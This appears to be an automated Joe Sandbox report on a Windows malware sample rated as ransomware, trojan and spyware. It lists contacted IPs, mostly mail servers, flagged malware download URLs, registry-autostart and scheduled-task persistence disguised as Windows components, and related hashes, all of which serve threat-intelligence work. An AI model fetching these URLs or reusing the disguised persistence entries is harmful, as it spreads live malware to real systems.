                                                                                                                                                                                                                                          http://185.215.113.66/ sysesvcmw.exe, sysesvcmw.exe, 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmptrue
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://185.215.113.66/from/H1925824589.exe, 00000009.00000002.892928931.0000000002A5B000.00000004.00000010.00020000.00000000.sdmp, 1925824589.exe, 00000009.00000002.889442870.00000000003BD000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://185.215.113.66/from/Tmlr1925824589.exe, 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://twizt.net/newtpp.exeP0gEkl9O5tiu.exefalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://twizt.net/newtpp.exeVgEkl9O5tiu.exe, 00000001.00000002.379592341.000000000073C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://185.215.113.66/from/n.txtz1925824589.exe, 00000009.00000002.891717748.0000000000464000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                          104.47.18.161
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          5.233.236.95
                                                                                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                          58224TCIIRfalse
                                                                                                                                                                                                                                          203.42.40.138
                                                                                                                                                                                                                                          extmail.bigpond.comAustralia
                                                                                                                                                                                                                                          1221ASN-TELSTRATelstraCorporationLtdAUfalse
                                                                                                                                                                                                                                          87.241.129.126
                                                                                                                                                                                                                                          unknownArmenia
                                                                                                                                                                                                                                          12297ARMENTELRepublicofArmeniaAMfalse
                                                                                                                                                                                                                                          104.47.2.33
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          52.101.42.9
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          104.47.11.33
                                                                                                                                                                                                                                          live-com.olc.protection.outlook.comUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          34.212.80.54
                                                                                                                                                                                                                                          cxr.mx.a.cloudfilter.netUnited States
                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                          217.69.139.150
                                                                                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                                                                                          47764MAILRU-ASMailRuRUfalse
                                                                                                                                                                                                                                          104.47.57.33
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          2.180.154.243
                                                                                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                          58224TCIIRtrue
                                                                                                                                                                                                                                          142.251.31.26
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                          142.250.150.26
                                                                                                                                                                                                                                          ASPMX2.GOOGLEMAIL.COMUnited States
                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                          142.250.150.27
                                                                                                                                                                                                                                          alt1.gmail-smtp-in.l.google.comUnited States
                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                          185.147.72.130
                                                                                                                                                                                                                                          mx01.lytzenitmail.dkDenmark
                                                                                                                                                                                                                                          59701LYTZENITDKfalse
                                                                                                                                                                                                                                          213.209.1.129
                                                                                                                                                                                                                                          smtp-in.libero.itItaly
                                                                                                                                                                                                                                          8660MATRIX-ASITfalse
                                                                                                                                                                                                                                          209.222.82.252
                                                                                                                                                                                                                                          d276014a.ess.barracudanetworks.comUnited States
                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                          77.88.21.249
                                                                                                                                                                                                                                          mx.yandex.netRussian Federation
                                                                                                                                                                                                                                          13238YANDEXRUfalse
                                                                                                                                                                                                                                          98.136.96.77
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          36646YAHOO-NE1USfalse
                                                                                                                                                                                                                                          185.70.42.128
                                                                                                                                                                                                                                          unknownSwitzerland
                                                                                                                                                                                                                                          62371PROTONCHfalse
                                                                                                                                                                                                                                          41.193.119.123
                                                                                                                                                                                                                                          mx.inbound.vox.co.zaSouth Africa
                                                                                                                                                                                                                                          11845Vox-TelecomZAfalse
                                                                                                                                                                                                                                          173.194.202.27
                                                                                                                                                                                                                                          alt4.gmail-smtp-in.l.google.comUnited States
                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                          173.194.202.26
                                                                                                                                                                                                                                          ALT4.ASPMX.L.GOOGLE.comUnited States
                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                          5.143.129.54
                                                                                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                                                                                          12389ROSTELECOM-ASRUfalse
                                                                                                                                                                                                                                          173.194.79.26
                                                                                                                                                                                                                                          aspmx.l.google.comUnited States
                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                          98.136.96.74
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          36646YAHOO-NE1USfalse
                                                                                                                                                                                                                                          98.136.96.75
                                                                                                                                                                                                                                          mta7.am0.yahoodns.netUnited States
                                                                                                                                                                                                                                          36646YAHOO-NE1USfalse
                                                                                                                                                                                                                                          98.136.96.76
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          36646YAHOO-NE1USfalse
                                                                                                                                                                                                                                          203.210.102.45
                                                                                                                                                                                                                                          mail.oneunited.com.auAustralia
                                                                                                                                                                                                                                          7496WEBCENTRAL-ASWebCentralAUfalse
                                                                                                                                                                                                                                          31.58.71.101
                                                                                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                          31549RASANAIRtrue
                                                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                                                          unknownReserved
                                                                                                                                                                                                                                          unknownunknownfalse
                                                                                                                                                                                                                                          212.27.48.6
                                                                                                                                                                                                                                          mx1.free.frFrance
                                                                                                                                                                                                                                          12322PROXADFRfalse
                                                                                                                                                                                                                                          108.177.127.27
                                                                                                                                                                                                                                          gmail-smtp-in.l.google.comUnited States
                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                          192.252.154.117
                                                                                                                                                                                                                                          mail.gamil.comUnited States
                                                                                                                                                                                                                                          3561CENTURYLINK-LEGACY-SAVVISUSfalse
                                                                                                                                                                                                                                          132.198.101.209
                                                                                                                                                                                                                                          wigeon.in-mail.uvm.eduUnited States
                                                                                                                                                                                                                                          1351UVM-EDU-ASUSfalse
                                                                                                                                                                                                                                          148.163.145.63
                                                                                                                                                                                                                                          mxa-0032a601.gslb.pphosted.comUnited States
                                                                                                                                                                                                                                          26211PROOFPOINT-ASN-US-WESTUSfalse
                                                                                                                                                                                                                                          184.180.138.132
                                                                                                                                                                                                                                          exchange.covenantacademy.netUnited States
                                                                                                                                                                                                                                          22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                                                                                                                                                                                                                                          67.195.228.94
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          36647YAHOO-GQ1USfalse
                                                                                                                                                                                                                                          52.179.17.190
                                                                                                                                                                                                                                          mx1-us.emailsecurity.appUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          193.222.135.150
                                                                                                                                                                                                                                          mx.tlen.plPoland
                                                                                                                                                                                                                                          31080O2-ASPLfalse
                                                                                                                                                                                                                                          82.137.199.137
                                                                                                                                                                                                                                          unknownSyrian Arab Republic
                                                                                                                                                                                                                                          29256INT-PDN-STE-ASSTEPDNInternalASSYfalse
                                                                                                                                                                                                                                          104.47.57.161
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          212.77.101.13
                                                                                                                                                                                                                                          mx5.wp.plPoland
                                                                                                                                                                                                                                          12827WIRTUALNAPOLSKAGDANSKPolandPLfalse
                                                                                                                                                                                                                                          151.245.109.155
                                                                                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                          31549RASANAIRfalse
                                                                                                                                                                                                                                          104.47.74.33
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          111.125.158.109
                                                                                                                                                                                                                                          unknownAfghanistan
                                                                                                                                                                                                                                          45178ROSHAN-AFMainStreetHouseNo13WazirAkbarKhanAFfalse
                                                                                                                                                                                                                                          216.71.132.28
                                                                                                                                                                                                                                          mx1.hc167-46.ca.iphmx.comUnited States
                                                                                                                                                                                                                                          16417IRONPORT-SYSTEMS-INCUSfalse
                                                                                                                                                                                                                                          67.195.228.86
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          36647YAHOO-GQ1USfalse
                                                                                                                                                                                                                                          5.137.240.85
                                                                                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                                                                                          12389ROSTELECOM-ASRUfalse
                                                                                                                                                                                                                                          67.195.228.84
                                                                                                                                                                                                                                          mx-aol.mail.gm0.yahoodns.netUnited States
                                                                                                                                                                                                                                          36647YAHOO-GQ1USfalse
                                                                                                                                                                                                                                          188.125.72.74
                                                                                                                                                                                                                                          mx-eu.mail.am0.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                                          34010YAHOO-IRDGBfalse
                                                                                                                                                                                                                                          188.125.72.73
                                                                                                                                                                                                                                          unknownUnited Kingdom
                                                                                                                                                                                                                                          34010YAHOO-IRDGBfalse
                                                                                                                                                                                                                                          194.93.26.38
                                                                                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                                                                                          34665PINDC-ASRUfalse
                                                                                                                                                                                                                                          67.195.228.106
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          36647YAHOO-GQ1USfalse
                                                                                                                                                                                                                                          67.195.228.109
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          36647YAHOO-GQ1USfalse
                                                                                                                                                                                                                                          98.136.96.91
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          36646YAHOO-NE1USfalse
                                                                                                                                                                                                                                          207.54.68.161
                                                                                                                                                                                                                                          mx1.hc147-99.eu.iphmx.comUnited States
                                                                                                                                                                                                                                          30238AS-IRONP-VEGAUSfalse
                                                                                                                                                                                                                                          93.17.128.165
                                                                                                                                                                                                                                          smtp-in.sfr.frFrance
                                                                                                                                                                                                                                          15557LDCOMNETFRfalse
                                                                                                                                                                                                                                          67.231.149.15
                                                                                                                                                                                                                                          mx0a-00164701.pphosted.comUnited States
                                                                                                                                                                                                                                          26211PROOFPOINT-ASN-US-WESTUSfalse
                                                                                                                                                                                                                                          103.129.252.82
                                                                                                                                                                                                                                          163mx01.mxmail.netease.comHong Kong
                                                                                                                                                                                                                                          137263NETEASE-AS-APNETEASEHONGKONGLIMITEDHKfalse
                                                                                                                                                                                                                                          104.47.51.33
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          104.47.12.33
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          104.47.75.228
                                                                                                                                                                                                                                          ontarionature-org.mail.protection.outlook.comUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          2.176.69.250
                                                                                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                          12880DCI-ASIRtrue
                                                                                                                                                                                                                                          34.141.161.132
                                                                                                                                                                                                                                          mx.tim.itUnited States
                                                                                                                                                                                                                                          2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                                          50.87.180.65
                                                                                                                                                                                                                                          mail.faithforfathers.orgUnited States
                                                                                                                                                                                                                                          46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                                                                          151.238.33.90
                                                                                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                          31549RASANAIRfalse
                                                                                                                                                                                                                                          103.96.22.26
                                                                                                                                                                                                                                          au-smtp-inbound-2.mimecast.comAustralia
                                                                                                                                                                                                                                          136792MIMECAST-AS-APMimecastAustraliaPtyLtdAUfalse
                                                                                                                                                                                                                                          173.252.87.251
                                                                                                                                                                                                                                          smtpin.vvv.facebook.comUnited States
                                                                                                                                                                                                                                          32934FACEBOOKUSfalse
                                                                                                                                                                                                                                          212.45.32.235
                                                                                                                                                                                                                                          mx101.solcon.nlNetherlands
                                                                                                                                                                                                                                          12414NL-SOLCONSOLCONNLfalse
                                                                                                                                                                                                                                          102.213.99.235
                                                                                                                                                                                                                                          unknownunknown
                                                                                                                                                                                                                                          36926CKL1-ASNKEfalse
                                                                                                                                                                                                                                          104.47.51.161
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          104.47.73.33
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          96.103.145.164
                                                                                                                                                                                                                                          mx2a1.comcast.netUnited States
                                                                                                                                                                                                                                          7922COMCAST-7922USfalse
                                                                                                                                                                                                                                          87.98.164.155
                                                                                                                                                                                                                                          smtp.yopmail.comFrance
                                                                                                                                                                                                                                          16276OVHFRfalse
                                                                                                                                                                                                                                          45.229.130.166
                                                                                                                                                                                                                                          unknownGuatemala
                                                                                                                                                                                                                                          266688CGInvestmentSociedadAnonimaGTfalse
                                                                                                                                                                                                                                          89.37.148.113
                                                                                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                          58224TCIIRfalse
                                                                                                                                                                                                                                          52.101.40.4
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          52.101.40.2
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          137.184.154.224
                                                                                                                                                                                                                                          em4.catchservers.comUnited States
                                                                                                                                                                                                                                          11003PANDGUSfalse
                                                                                                                                                                                                                                          62.212.36.229
                                                                                                                                                                                                                                          unknownGeorgia
                                                                                                                                                                                                                                          34797SYSTEM-NETGEfalse
                                                                                                                                                                                                                                          104.47.74.10
                                                                                                                                                                                                                                          horsepower-org.mail.protection.outlook.comUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          67.195.228.110
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          36647YAHOO-GQ1USfalse
                                                                                                                                                                                                                                          162.241.217.135
                                                                                                                                                                                                                                          landdesigns.comUnited States
                                                                                                                                                                                                                                          46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                                                                          108.177.126.26
                                                                                                                                                                                                                                          ASPMX.L.GOOGLE.COMUnited States
                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                          67.195.228.111
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          36647YAHOO-GQ1USfalse
                                                                                                                                                                                                                                          207.211.30.141
                                                                                                                                                                                                                                          us-smtp-inbound-1.mimecast.comUnited States
                                                                                                                                                                                                                                          30031MIMECAST-USfalse
                                                                                                                                                                                                                                          104.47.17.161
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          34.90.152.141
                                                                                                                                                                                                                                          mx.tin.itUnited States
                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                          205.220.175.7
                                                                                                                                                                                                                                          mxb-004e5401.gslb.pphosted.comUnited States
                                                                                                                                                                                                                                          22843PROOFPOINT-ASN-US-EASTUSfalse
                                                                                                                                                                                                                                          34.149.236.64
                                                                                                                                                                                                                                          mxa.mailgun.orgUnited States
                                                                                                                                                                                                                                          2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                                          137.191.224.10
                                                                                                                                                                                                                                          cwext.gn.gov.ieIreland
                                                                                                                                                                                                                                          15806ORG-IG30-RIPEIEfalse
                                                                                                                                                                                                                                          104.18.115.97
                                                                                                                                                                                                                                          icanhazip.comUnited States
                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                          37.255.140.192
                                                                                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                          58224TCIIRfalse
                                                                                                                                                                                                                                          217.70.178.216
                                                                                                                                                                                                                                          unknownFrance
                                                                                                                                                                                                                                          29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                                                                                                                                                                                                          205.220.168.57
                                                                                                                                                                                                                                          mx0a-00264602.pphosted.comUnited States
                                                                                                                                                                                                                                          26211PROOFPOINT-ASN-US-WESTUSfalse
                                                                                                                                                                                                                                          104.47.56.33
                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          136.143.191.44
                                                                                                                                                                                                                                          mx3.zoho.comUnited States
                                                                                                                                                                                                                                          2639ZOHO-ASUSfalse
                                                                                                                                                                                                                                          1.34.58.190
                                                                                                                                                                                                                                          unknownTaiwan; Republic of China (ROC)
                                                                                                                                                                                                                                          3462HINETDataCommunicationBusinessGroupTWfalse
                                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                                          192.168.1.111
                                                                                                                                                                                                                                          Joe Sandbox Version:38.0.0 Beryl
                                                                                                                                                                                                                                          Analysis ID:1292729
                                                                                                                                                                                                                                          Start date and time:2023-08-17 14:30:45 +02:00
                                                                                                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                                                          Overall analysis duration:0h 11m 13s
                                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                                                                                          Number of analysed new started processes analysed:14
                                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                                          • HDC enabled
                                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                                          Sample file name:gEkl9O5tiu.exe
                                                                                                                                                                                                                                          (renamed file extension from none to exe, renamed because original name is a hash value)
                                                                                                                                                                                                                                          Original Sample Name:2ea6c5e97869622dfe70d2b34daf564e
                                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                                          Classification:mal100.rans.spre.troj.spyw.evad.winEXE@12/15@4697/100
                                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                                          • Successful, ratio: 85.7%
                                                                                                                                                                                                                                          HDC Information:
                                                                                                                                                                                                                                          • Successful, ratio: 99.3% (good quality ratio 93.7%)
                                                                                                                                                                                                                                          • Quality average: 82.1%
                                                                                                                                                                                                                                          • Quality standard deviation: 27.7%
                                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                                          • Successful, ratio: 98%
                                                                                                                                                                                                                                          • Number of executed functions: 87
                                                                                                                                                                                                                                          • Number of non-executed functions: 139
                                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                                          • Override analysis time to 240s for rundll32
                                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 209.197.3.8, 20.109.209.108, 119.252.155.14, 202.137.234.30
                                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): redir.update.msft.com.trafficmanager.net, mx.pro.rediff.akadns.net, www.update.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, mx.rediffmail.rediff.akadns.net, wu-bg-shim.trafficmanager.net
                                                                                                                                                                                                                                          • Execution Graph export aborted for target 2465513676.exe, PID 9636 because it is empty
                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                                          14:31:29API Interceptor131x Sleep call for process: gEkl9O5tiu.exe modified
                                                                                                                                                                                                                                          14:31:39AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysesvcmw.exe
                                                                                                                                                                                                                                          14:31:46API Interceptor2504x Sleep call for process: sysesvcmw.exe modified
                                                                                                                                                                                                                                          14:32:54API Interceptor2981x Sleep call for process: 1925824589.exe modified
                                                                                                                                                                                                                                          14:35:25API Interceptor262x Sleep call for process: 150623101.exe modified
                                                                                                                                                                                                                                          14:35:39Task SchedulerRun new task: Windows Upgrade Manager path: "C:\Users\user\Windows Upgrade\wupgrdsv.exe"
                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          104.47.18.161file.msg.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            Update-KB78-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              Update-KB2984-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                64434c8c20fe4b64041795ac2a1472662fa5d33fa0cbb.exeGet hashmaliciousRaccoon RedLine SmokeLoader Tofsee Vidar XmrigBrowse
                                                                                                                                                                                                                                                  readme.txt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    R3459nT1Oj.exeGet hashmaliciousRaccoon RedLine SmokeLoader Tofsee Vidar XmrigBrowse
                                                                                                                                                                                                                                                      Xz2kK8et6i.exeGet hashmaliciousTofsee XmrigBrowse
                                                                                                                                                                                                                                                        SecuriteInfo.com.Trojan.DownLoader41.25700.7371.exeGet hashmaliciousTofsee XmrigBrowse
                                                                                                                                                                                                                                                          JgC7A84YOU.exeGet hashmaliciousTofsee XmrigBrowse
                                                                                                                                                                                                                                                            d5lcwbdDfu.exeGet hashmaliciousTofsee XmrigBrowse
                                                                                                                                                                                                                                                              asgRF2AfuM.exeGet hashmaliciousTofsee XmrigBrowse
                                                                                                                                                                                                                                                                XK7H3egMcR.exeGet hashmaliciousTofsee XmrigBrowse
                                                                                                                                                                                                                                                                  ivMI3veipP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    file.msg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      Update-KB1484-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        sKu7FoPlk3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          CJdYRiB9uJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                            mx0b-00164701.pphosted.comJgC7A84YOU.exeGet hashmaliciousTofsee XmrigBrowse
                                                                                                                                                                                                                                                                            • 67.231.157.15
                                                                                                                                                                                                                                                                            12attachmen.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                            • 67.231.157.15
                                                                                                                                                                                                                                                                            43blgnqvilEA.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                            • 67.231.157.15
                                                                                                                                                                                                                                                                            33qle.doc .exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                            • 67.231.157.15
                                                                                                                                                                                                                                                                            T4fLzf3nYL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 67.231.157.15
                                                                                                                                                                                                                                                                            mx-ha02.web.defile.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                                                                                                            • 212.227.17.8
                                                                                                                                                                                                                                                                            sKu7FoPlk3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 212.227.17.8
                                                                                                                                                                                                                                                                            tODdTCG8Sk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 212.227.17.8
                                                                                                                                                                                                                                                                            dGb6pfsOb9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 212.227.17.8
                                                                                                                                                                                                                                                                            s1Rorr5Zkd.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                            • 212.227.17.8
                                                                                                                                                                                                                                                                            9XUMj7v4Xy.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                            • 212.227.17.8
                                                                                                                                                                                                                                                                            8Hj7AwNyOC.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                            • 212.227.17.8
                                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUShttps://outlook.office365.com/Encryption/retrieve.ashx?recipientemailaddress=gc%40virtualintelligencebriefing.com&senderemailaddress=seand%40tbogc.com&senderorganization=AwF%2bAAAAAnoAAAADAQAAAAFZD4p%2baKJFjAMdUkkzaihPVT1nY2JjMzY1Lm9ubWljcm9zb2Z0LmNvbSxPVT1NaWNyb3NvZnQgRXhjaGFuZ2UgSG9zdGVkIE9yZ2FuaXphdGlvbnMsREM9TkFNUFIxM0EwMDcsREM9UFJPRCxEQz1PVVRMT09LLERDPUNPTXar8yE07kREqyaxMcwVbZxDTj1Db25maWd1cmF0aW9uLENOPWdjYmMzNjUub25taWNyb3NvZnQuY29tLENOPUNvbmZpZ3VyYXRpb25Vbml0cyxEQz1OQU1QUjEzQTAwNyxEQz1QUk9ELERDPU9VVExPT0ssREM9Q09NAQ%3d%3d&messageid=%3cCH0PR12MB50752A9B50DF228C6D90577CC715A%40CH0PR12MB5075.namprd12.prod.outlook.com%3e&cfmRecipient=SystemMailbox%7bD0E409A0-AF9B-4720-92FE-AAC869B0D201%7d%40gcbc365.onmicrosoft.com&consumerEncryption=false&senderorgid=83e2b12e-cde9-4825-9068-68a13989bfc4&urldecoded=1&e4e_sdata=Lb7bJGLGcEwOEySaBOeUGMgIBoLFz8n6fvomE23968H656jZo6zddXBytq9tPM%2fev7ThrumZi5Uc8cD%2bL8DyYiysK%2f2dtTf868FQ%2b3wQsaP7FmEfx8lR7XTYxmz%2bzMF8%2fbAjG1V0%2bihnxSWxUs6eVKzPyNTA8IDifndDJFy4ZeyX%2fwzKY0CLVJdr7nFQn9xaTwnjEfHr55nrVpTTs8ZItGcrXVkgo24n%2boEw1SYWwJ4bmKlmORhhhnkYhCiZjQ9r48ls%2b%2biAsEeRSmh%2bhfORwr1DOGWbqJMuo6RYbAgPuUsVGUmBjaGpZAQ7VCt9e46YUqF4On9ke7waAf9anENJGA%3d%3dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 52.98.250.130
